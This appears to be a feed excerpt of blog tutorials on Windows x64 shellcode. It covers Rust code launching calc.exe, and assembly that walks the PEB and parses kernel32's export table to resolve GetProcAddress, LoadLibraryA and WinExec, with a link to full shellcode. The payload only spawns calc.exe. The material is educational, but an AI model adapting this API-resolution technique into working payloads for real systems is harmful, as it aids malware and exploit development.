class="nf">new</span><span class="p">(</span><span class="s">r"C:\Windows\System32\calc.exe"</span><span class="p">)</span><span class="nf">.unwrap</span><span class="p">();</span> <span class="k">let</span> <span class="n">call_calc</span> <span class="o">=</span> <span class="nf">winexec</span><span class="p">(</span><span class="n">calc_string</span><span class="nf">.as_ptr</span><span class="p">(),</span> <span class="mi">1</span><span class="p">);</span> <span class="nd">println!</span><span class="p">(</span><span class="s">"WinExec returned: {:#x}"</span><span class="p">,</span> <span class="n">call_calc</span><span class="p">);</span> <span class="nf">exitprocess</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span> <span class="p">};</span> <span class="p">}</span> </code></pre> </div> <h2> Comparison: Rust vs Assembly </h2> <h3> Compiled Rust Binary </h3> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="w"> </span><span class="err">$</span><span class="w"> </span><span class="n">cargo</span><span class="w"> </span><span class="nx">build</span><span class="w"> </span><span class="nt">--release</span><span class="w"> </span><span class="err">$</span><span class="w"> </span><span class="n">ls</span><span class="w"> </span><span class="nx">calc.exe</span><span class="w"> </span><span class="n">Mode</span><span class="w"> </span><span class="nx">LastWriteTime</span><span class="w"> </span><span class="nx">Length</span><span class="w"> </span><span class="nx">Name</span><span class="w"> </span><span class="o">----</span><span class="w"> </span><span class="o">-------------</span><span class="w"> </span><span class="o">------</span><span class="w"> </span><span class="o">----</span><span class="w"> </span><span class="nt">-a</span><span class="o">----</span><span class="w"> </span><span class="mi">2025</span><span class="n">/5/2</span><span class="w"> </span><span class="nx">05:35</span><span class="w"> </span><span class="nx">PM</span><span class="w"> </span><span class="nx">165376</span><span class="w"> </span><span class="nx">calc.exe</span><span class="w"> </span></code></pre> </div> <h3> Assembly Binary </h3> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="err">$</span><span class="w"> </span><span class="n">ls</span><span class="w"> </span><span class="o">.</span><span class="nx">\asm.exe</span><span class="w"> </span><span class="n">Mode</span><span class="w"> </span><span class="nx">LastWriteTime</span><span class="w"> </span><span class="nx">Length</span><span class="w"> </span><span class="nx">Name</span><span class="w"> </span><span class="o">----</span><span class="w"> </span><span class="o">-------------</span><span class="w"> </span><span class="o">------</span><span class="w"> </span><span class="o">----</span><span class="w"> </span><span class="nt">-a</span><span class="o">----</span><span class="w"> </span><span class="mi">2025</span><span class="n">/5/2</span><span class="w"> </span><span class="nx">05:37</span><span class="w"> </span><span class="nx">PM</span><span class="w"> </span><span class="nx">127488</span><span class="w"> </span><span class="nx">asm.exe</span><span class="w"> </span></code></pre> </div> <p>Without using the standard library (#![no_std]), the binary size is surprisingly close to its assembly counterpart.</p> shellcode rust peb security Calling calc.exe in Pure Shellcode by Walking the PEB windasunnie Fri, 18 Apr 2025 09:16:26 +0000 https://forem.com/windasunnie/shellcode-2h4j https://forem.com/windasunnie/shellcode-2h4j <p>Continue paste post: <a href="https://dev.to/windasunnie/shellcode-call-calcexe-why-cannot-use-c-write-shellcode-2g84">Shellcode - Why Cannot Use C Write Shellcode</a></p> <p>Improvement:</p> <ul> <li>PEB Traversal</li> <li>Dynamic API Resolution</li> </ul> <h1> PEB Traversal </h1> <h2> What is the PEB? </h2> <p>The Process Environment Block (PEB) is a data structure that stores process-wide information. It is a member of the Thread Environment Block (TEB) and contains information about the process, including a linked list of all loaded modules.</p> <h2> How to Get the PEB Pointer? </h2> <p>Module enumeration typically starts from the PEB, so retrieving its pointer is the first step. The PEB pointer resides within the TEB, and the TEB pointer is located at fs:[0x18] on x86 or gs:[0x30] on x64 systems.</p> <p><strong>Common Methods to Access TEB/PEB:</strong></p> <ol> <li> <strong>Debugger View (e.g., x64dbg, WinDbg)</strong> : View the fs/gs register — it points to the TEB. Then follow the offset to get the PEB.</li> <li><p><strong>Disassemble or Examine Memory Layouts</strong> : Use TEB struct layout to locate the PEB.</p></li> <li><p><strong>Accessing via Segment Register</strong></p></li> </ol> <p>TEB and TIB Layout<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code># ref: https://www.vergiliusproject.com/kernels/x64/windows-11/24h2/_NT_TIB32 struct _NT_TIB32 { ULONG ExceptionList; // 0x00 ULONG StackBase; // 0x04 ULONG StackLimit; // 0x08 ULONG SubSystemTib; // 0x0C union { ULONG FiberData; // 0x10 ULONG Version; }; ULONG ArbitraryUserPointer; // 0x14 ULONG Self; // 0x18 &lt;- fs:[0x18] = TEB pointer }; # ref: https://www.vergiliusproject.com/kernels/x64/windows-11/24h2/_TEB32 struct _TEB32 { struct _NT_TIB32 NtTib; // 0x00 ULONG EnvironmentPointer; // 0x1C struct _CLIENT_ID32 ClientId;// 0x20 ULONG ActiveRpcHandle; // 0x28 ULONG ThreadLocalStoragePointer; // 0x2C ULONG ProcessEnvironmentBlock; // 0x30 &lt;- fs:[0x30] = PEB pointer ... }; </code></pre> </div> <p>TIB struct is included in TEB as the first member, so the first address of TIB is the first address of TEB. </p> <h1> Dynamic API Resolution </h1> <h2> Retrieving Kernel32.dll Base Address </h2> <h3> Using PowerShell: </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Get-Process -Id 1300 | ForEach-Object { $_.Modules | Where-Object { $_.ModuleName -like "kernel32.dll" } | Select-Object ModuleName, @{Name="BaseAddress"; Expression={$_.BaseAddress.ToString("X")}}, FileName } </code></pre> </div> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fygnmm9u4ea50bdza2ehp.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fygnmm9u4ea50bdza2ehp.png" alt=" " width="800" height="129"></a></p> <h3> Using x64dbg: </h3> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1ndyeyt23gndl1tkd6fa.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1ndyeyt23gndl1tkd6fa.png" alt=" " width="800" height="182"></a></p> <h3> Using WinDbg (Follow Pointer Chain): </h3> <p>TEB-&gt;PEB-&gt;Ldr-&gt;InMemoryOrderLoadList-&gt;currentProgram-&gt;ntdll-&gt;kernel32.BaseDll</p> <h2> Export Table Traversal Flow </h2> <p>When resolving functions like WinExec dynamically, the process is:</p> <ol> <li>Access Kernel32 Base Address</li> <li> <p>Parse PE Headers</p> <ul> <li>Locate IMAGE_DOS_HEADER at DllBase</li> <li>Use <code>e_lfanew</code> to find IMAGE_NT_HEADERS</li> <li>Locate the Export Directory via Optional Header → DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]</li> </ul> </li> <li> <p>Resolve API</p> <ul> <li>Parse Export Directory</li> <li>Match target name in Name Table</li> <li>Retrieve its Ordinal</li> <li>Use Ordinal to index Function Address Table</li> <li>Resolve absolute address = DllBase + Function RVA</li> </ul> </li> </ol> <h3> WinDbg/Memory Viewer Visuals </h3> <h4> 1. <strong>Displaying the Thread Environment Block (TEB) Structure</strong> </h4> <p><strong>Locating the PEB</strong>: The TEB contains a pointer to the PEB (PEB* ProcessEnvironmentBlock), which is essential for finding loaded modules (e.g., kernel32.dll).<br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwb03z2z412at7o5g8mez.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwb03z2z412at7o5g8mez.png" alt=" " width="800" height="263"></a></p> <h4> 2. <strong>Displaying the Process Environment Block (PEB) Structure</strong> </h4> <p><strong>Process Environment Block (PEB)</strong> is a fundamental Windows structure containing process-wide data such as:<br> • <strong>Loaded Modules (DLLs)</strong> via <code>PEB_LDR_DATA* Ldr</code><br> • Command-line Arguments<br> • Heap Information<br> • Binary Image Base Address<br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmof4tj4396xgf2ul90nj.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmof4tj4396xgf2ul90nj.png" alt=" " width="800" height="451"></a></p> <h4> 3. <strong>Analyzing the PEB_LDR_DATA Structure for Module Enumeration</strong> </h4> <p>Displays the <strong>PEB_LDR_DATA</strong> structure, a critical part of the Process Environment Block (PEB) that manages loaded modules (DLLs/EXEs) in a process. This structure contains three doubly linked lists used to track modules in different load orders:</p> <p>a. InLoadOrderModuleList – Lists modules in the order they were <em>loaded</em>.<br> b. <strong>InMemoryOrderModuleList</strong> – Lists modules in the order they appear in <em>memory</em>.<br> c. InInitializationOrderModuleList – Lists modules in the order they were <em>initialized</em>.<br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnn79z017lrkkems8y5zv.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnn79z017lrkkems8y5zv.png" alt=" " width="800" height="193"></a></p> <h4> 4. <strong>Analyzing the _LDR_DATA_TABLE_ENTRY Structure</strong> </h4> <p>The <strong><code>_LDR_DATA_TABLE_ENTRY</code></strong> structure contains critical information about each loaded module (DLL/EXE) in a process.</p> <p><strong>Key Fields Explained:</strong></p> <p>a. <strong>DllBase</strong>: The base address of the loaded module (essential for finding exported functions)<br> b. FullDllName/BaseDllName: The module's path and filename (e.g., "C:\Windows\System32\kernel32.dll")<br> c. InXXXOrderLinks: Linked list entries for different load orders<br> d. SizeOfImage: The module's size in memory<br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1vpioullhrem0ftukfus.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1vpioullhrem0ftukfus.png" alt=" " width="800" height="232"></a></p> <h4> 5. <strong>Examining the _IMAGE_DATA_DIRECTORY Structure</strong> </h4> <p>The <code>_IMAGE_DATA_DIRECTORY</code> structure is a fundamental part of the <strong>Portable Executable (PE) file format</strong> in Windows. It describes a data directory entry in the PE header, which points to critical sections of a binary (EXE/DLL), such as:</p> <ul> <li> <strong>Export Table</strong> (for API functions)</li> <li> <strong>Import Table</strong> (for dependencies)</li> <li> <strong>Base Relocation Table</strong> (for ASLR)</li> <li><strong>Debug Information</strong></li> <li> <strong>TLS (Thread Local Storage) Data</strong> <img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fep72wo2ry22njbvwl1gu.png" title="Data Directory address : 00007fffc97770000 (kernel32.dll) + 0x90160 (data directory)" alt="Data Directory address" width="800" height="55"> </li> </ul> <h4> 6. <strong>Analyzing PE Headers with _IMAGE_DOS_HEADER</strong> </h4> <p>The _IMAGE_DOS_HEADER structure is the starting point of every PE (Portable Executable) file (EXE/DLL). When examining it at a module's base address (e.g., kernel32.dll), you can:<br> a. <strong>Validate the PE file signature</strong> (<code>e_magic = 0x5A4D</code> → "MZ").<br> b. <strong>Locate the NT headers</strong> via <code>e_lfanew</code> (offset to _IMAGE_NT_HEADERS).<br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fl35qs6v4hyx96ls8yceq.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fl35qs6v4hyx96ls8yceq.png" alt=" " width="800" height="366"></a></p> <h4> 7. <strong>Analyzing 64-bit PE NT Headers (_IMAGE_NT_HEADERS64)</strong> </h4> <p>The <strong><code>_IMAGE_NT_HEADERS64</code></strong> structure defines the <strong>core metadata of a 64-bit PE file</strong>, including:</p> <ul> <li> <strong>PE Signature</strong> (<strong><code>"PE\0\0"</code></strong>)</li> <li> <strong>File Header</strong> (<strong><code>_IMAGE_FILE_HEADER</code></strong>)</li> <li> <strong>Optional Header</strong> (<strong><code>_IMAGE_OPTIONAL_HEADER64</code></strong>) — Contains critical data directories (exports, imports, relocations).</li> </ul> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fidx0806jgtpzh2vrehhb.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fidx0806jgtpzh2vrehhb.png" alt=" " width="800" height="89"></a></p> <h4> 8. <strong>Analyzing 64-bit PE Optional Header (_IMAGE_OPTIONAL_HEADER64)</strong> </h4> <p>The <strong><code>_IMAGE_OPTIONAL_HEADER64</code></strong> structure contains <strong>critical metadata for 64-bit PE files</strong>, including:</p> <ul> <li> <strong>Image base address</strong> (<strong><code>AddressOfEntryPoint</code></strong>, <strong><code>ImageBase</code></strong>)</li> <li> <strong>Section alignment/sizes</strong> (<strong><code>SectionAlignment</code></strong>, <strong><code>FileAlignment</code></strong>)</li> <li> <strong>Data directories</strong> (exports, imports, relocations, TLS, etc.)</li> </ul> <p>This is where you find the <strong>RVA (Relative Virtual Address)</strong> of key structures like the <strong>Export Directory</strong><br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fax23d45iqnc3vu64pny9.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fax23d45iqnc3vu64pny9.png" alt=" " width="800" height="565"></a></p> <h4> 9. <strong>Dumping PE Data Directories</strong> </h4> <p>Get the RVA (Relative Virtual Address) and size of 16 PE data directories<br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnbfjysc0bif64ssvlpvi.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnbfjysc0bif64ssvlpvi.png" alt=" " width="800" height="401"></a></p> <h4> 10. <strong>Analyze Export Directory</strong> </h4> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftrg3s65a5fu9lm5f1bxh.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftrg3s65a5fu9lm5f1bxh.png" alt=" " width="800" height="221"></a></p> <h4> 11. <strong>List All function</strong> </h4> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0eqnic5p3320oko5gokt.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0eqnic5p3320oko5gokt.png" alt=" " width="800" height="286"></a></p> <p>PE Parsing Reference</p> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Offset</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>0x3c into the file</td> <td>RVA of PE signature</td> </tr> <tr> <td>0x78 bytes after PE signature</td> <td>RVA of Export Table</td> </tr> <tr> <td>0x14 into the Export Table</td> <td>Number of functions exported by a module</td> </tr> <tr> <td>0x1c into the Export Table</td> <td>RVA of Address Table - addresses of exported functions</td> </tr> <tr> <td>0x20 into the Export Table</td> <td>RVA of Name Pointer Table - addresses of exported function names</td> </tr> <tr> <td>0x24 into the Export Table</td> <td>RVA of Ordinal Table - function order number as listed in the table</td> </tr> </tbody> </table></div> <p>Get <code>AddressOfNames RVA</code> - 00091afc</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F95znwczflsvtxpnttaaq.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F95znwczflsvtxpnttaaq.png" alt=" " width="800" height="45"></a></p> <h4> 12. Dump AddressOfNames </h4> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fipk53v16sv0c56fhqmdo.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fipk53v16sv0c56fhqmdo.png" alt=" " width="800" height="180"></a><br> Compare the first 8 bytes to see if it is "GetProcA"<br> ...<br> TOO MUCH!! <br> Let's change to tool named <code>PEView</code></p> <h4> 13. Export Table - Number of Exported Functions </h4> <p>In this case, RVA contains 643 functions that module kernel32.dll export.<br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgr8codqz43oo9ctk1me4.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgr8codqz43oo9ctk1me4.png" alt=" " width="800" height="349"></a></p> <p>WinExec RVA is <code>000A48D3</code><br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyhk3nusw9ok9x6yv2yzw.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyhk3nusw9ok9x6yv2yzw.png" alt=" " width="800" height="292"></a></p> <p>ExitProcess RVA is <code>0009D4DE</code><br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fd3whw129998xzsg3bowo.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fd3whw129998xzsg3bowo.png" alt=" " width="800" height="209"></a></p> <h5> Direct get process base address </h5> <p>GetProcAddress<br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9qffw3pwdg73g8edtznu.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9qffw3pwdg73g8edtznu.png" alt=" " width="800" height="36"></a></p> <p>WinExec<br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkfaybqwn9p8j1wu4nzu2.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkfaybqwn9p8j1wu4nzu2.png" alt=" " width="800" height="33"></a></p> <p>ExitProcess<br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmsoi99r4bb26nuaklcr4.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmsoi99r4bb26nuaklcr4.png" alt=" " width="800" height="27"></a></p> <blockquote> <p>Note: Some functions are forwarded/thunked; symbols may refer to implementation aliases like ExitProcessImplementation.</p> </blockquote> <h3> Manually Resolving API Addresses from PEB (x64 Shellcode Style) </h3> <h4> Overview </h4> <p>This above explains how to manually resolve function addresses such as <code>WinExec</code>, <code>LoadLibraryA</code>, and <code>ExitProcess</code> from within a shellcode or assembly stub. We walk through parsing the PEB (Process Environment Block), traversing the loader's module list, parsing the PE headers, and locating the desired API in the Export Address Table of kernel32.dll.</p> <h4> Process Flow </h4> <ol> <li>Obtain kernel32.dll Base Address from the PEB</li> <li>Parse PE Structure starting from the base address: <ul> <li>DOS Header → NT Header (via offset 0x3C)</li> <li>NT Header → Optional Header → Data Directory → Export Directory</li> </ul> </li> <li>Parse Export Directory to: <ul> <li>Locate the function name (WinExec, etc.) via the Name Pointer Table</li> <li>Resolve its ordinal</li> <li>Use the ordinal to get the RVA from the AddressOfFunctions table</li> <li>Add RVA to the DLL base address → function's actual memory address</li> </ul> </li> </ol> <h4> Get PEB (Process Environment Block) Address (x64): </h4> <p>In x64 Windows, the PEB is accessible via the GS segment register. GS:[0x60] points directly to the PEB structure.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>xor rcx, rcx ; RCX = 0 mov rax, [gs:rcx + 0x60] </code></pre> </div> <h4> Access <code>PEB_LDR_DATA</code> </h4> <p>Offset 0x18 within the PEB points to the Ldr field, which holds module loader information.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>mov rax, [rax + 0x18] ; PEB -&gt; Ldr (PEB_LDR_DATA) </code></pre> </div> <h4> Get InMemoryOrderModuleList </h4> <p>This doubly-linked list at offset 0x20 of PEB_LDR_DATA contains entries for all loaded modules.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>mov rsi, [rax + 0x20] ; Ldr -&gt; InMemoryOrderModuleList.Flink </code></pre> </div> <h4> Traverse Module List </h4> <p>Each node in the list is a _LDR_DATA_TABLE_ENTRY. Modules are typically ordered as:</p> <ol> <li>Executable itself</li> <li>ntdll.dll</li> <li>kernel32.dll </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>lodsq ; Load first module (ntdll.dll) into RAX, increment RSI xchg rax, rsi ; Swap RAX and RSI (now RSI points to next module) lodsq ; Load second module (kernel32.dll) into RAX </code></pre> </div> <h4> Get Base Address of kernel32.dll </h4> <p>The DllBase field at offset 0x20 of the _LDR_DATA_TABLE_ENTRY gives the base address.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>mov rbx, [rax + 0x20] ; LDR_DATA_TABLE_ENTRY + 0x20 = DllBase (kernel32.dll 的 base address) </code></pre> </div> <h4> Parse Export Table </h4> <p>We now locate the Export Directory inside the PE header of kernel32.dll.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>; Search Export Table xor r8, r8 ; R8 = 0 mov r8d, [rbx + 0x3c] ; Get PE header offset (e_lfanew at offset 0x3C) mov rdx, r8 ; Copy PE header offset to RDX add rdx, rbx ; Calculate PE header address (base + offset) mov r8d, [rdx + 0x88] ; Get Export Table RVA (offset 0x88 in PE header) add r8, rbx. ; Calculate Export Table address (base + RVA) </code></pre> </div> <h4> Locate Function Name </h4> <p>We want to find the address of <strong>GetProcAddress</strong>.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>; Search Name Pointer Table, prepare to find function name xor rsi, rsi ; RSI = 0 mov esi, [r8 + 0x20] ; AddressOfNames (offset 0x20 in Export Table) add rsi, rbx ; Calculate Name Pointer Table address (base + RVA) xor rcx, rcx ; Zero out RCX (will be used as counter) mov r9, 0x41636f7250746547 ; Prepare first 8 bytes of "GetProcA" for comparison (little-endian) ; Find GetProcAddress in function name Get_Function: inc rcx ; Increment function counter xor rax, rax ; RAX = 0 mov eax, [rsi + rcx * 4] ; Get RVA of function name (array of 4-byte RVAs) add rax, rbx ; Calculate function name address (base + RVA) cmp QWORD [rax], r9 ; Compare first 8 bytes is "GetProcA" jnz Get_Function ; If not matched, continue searching xor rsi, rsi ; RSI = 0 mov esi, [r8 + 0x24] ; AddressOfNameOrdinals (offset 0x24 in Export Table) add rsi, rbx ; Calculate Ordinal Table address (base + RVA) mov cx, [rsi + rcx * 2] ; Get function ordinal (array of 2-byte values) xor rsi, rsi ; RSI = 0 mov esi, [r8 + 0x1c] ; AddressOfFunctions (offset 0x1C in Export Table) add rsi, rbx ; Calculate Address Table address (base + RVA) xor rdx, rdx ; RDX = 0 mov edx, [rsi + rcx * 4] ; Get function RVA (array of 4-byte RVAs) add rdx, rbx ; Calculate function address (base + RVA) mov rdi, rdx ; Store GetProcAddress address in RDI </code></pre> </div> <h4> Use GetProcAddress to get LoadLibraryA address </h4> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>; Use GetProcAddress to get LoadLibraryA address getprocaddr: mov rcx, 0x41797261 ; Prepare second part of "LoadLibraryA" string ("aryA") push rcx ; Push to stack mov rcx, 0x7262694c64616f4c. ; Prepare first part of "LoadLibraryA" string ("LoadLibr") push rcx ; Push to stack mov rdx, rsp ; RDX points to "LoadLibraryA" string on stack mov rcx, rbx ; RCX contains kernel32.dll base address sub rsp, 0x30 ; Allocate shadow space (32 bytes) + align stack call rdi ; Call GetProcAddress(kernel32.dll, "LoadLibraryA") add rsp, 0x30 ; Restore stack pointer add rsp, 0x10 ; Clean up string from stack (16 bytes) mov rsi, rax ; Store LoadLibraryA address in RSI </code></pre> </div> <p>Continue: Resolve WinExec, ExitProcess, etc.<br> Repeating the steps: locate name in Export Table → get ordinal → get RVA → resolve to VA.</p> <p>Here's the link to the <a href="https://github.com/nevernever69/windows64bit-shellcode/blob/main/windowsx64%20shellcode%20to%20spwan%20calc.asm" rel="noopener noreferrer">full code</a> — thanks to <strong>nevernever69</strong> for providing the ultimate code to the call calc.exe shellcode.</p> shellcode peb kernel32 security Shellcode call calc.exe - Why cannot use C write shellcode windasunnie Wed, 16 Apr 2025 11:36:41 +0000 https://forem.com/windasunnie/shellcode-call-calcexe-why-cannot-use-c-write-shellcode-2g84 https://forem.com/windasunnie/shellcode-call-calcexe-why-cannot-use-c-write-shellcode-2g84 <h1> Why C-Based Code Cannot Be Used as Shellcode </h1> <h2> Using C to Build a <code>calc.exe</code> Executable </h2> <div 